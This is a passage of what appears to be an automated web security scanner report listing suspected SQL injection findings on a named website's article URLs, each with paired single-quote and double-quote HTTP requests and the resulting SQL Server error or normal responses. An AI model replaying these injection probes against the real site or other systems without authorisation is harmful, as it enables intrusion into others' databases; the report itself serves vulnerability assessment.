<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 22 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 22, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw'/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JIKAFEIDHBCLKJDLDIPDDONE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw''/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NIKAFEIDLCPHGKFHNDCLMFCA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 23 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 23, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134'/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=AJKAFEIDBJJHHGIDCEKGKLIM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134''/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FJKAFEIDFGIECJLLAKELPGAC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 24 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 24, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei'/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HJKAFEIDLPPJGPJPJPJEEMPL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei''/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LJKAFEIDEPDOAILFNONPCBLA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 25 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 25, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw'/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=AKKAFEIDDMGDJCKEMOFNBDKN; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw''/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=DKKAFEIDNFKACFNBNBPGBNGE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 26 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 26, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev'/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LKKAFEIDEPOJGJHGIPELGNGH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev''/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NKKAFEIDKCLGMALBNPNNNIMF; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 27 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 27, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d'/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23779 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=CLKAFEIDPBDMCIADDEDBACHA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string ' ORDER BY ord DESC'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d''/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FLKAFEIDFJNGHPNBAAMBCLFJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 28 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 28, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images' HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:12:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 24040 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=KLKAFEIDBCIKAPHKCCHIMJBE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Unclosed quotation mark before the character string '/articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images'' HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:12:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NLKAFEIDMONDAHHDCODOBMPK; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html'/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=JNJAFEIDCBFAKDCLFEIJLDLM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html''/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NNJAFEIDKNKLPMHLLJOCJLDJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg'/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=BOJAFEIDGGGECJLNNKHNHPJJ; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg''/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=FOJAFEIDIAHDCDOOOPIPGHAK; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c'/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HOJAFEIDMHHENPHFEICHKFAL; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c''/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=MOJAFEIDPFBEBKHGFGKLKCNE; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d'/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=APJAFEIDHHJBHAEDMMCBAANM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d''/x26h/x3d447/x26w/x3d565/x26sz/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
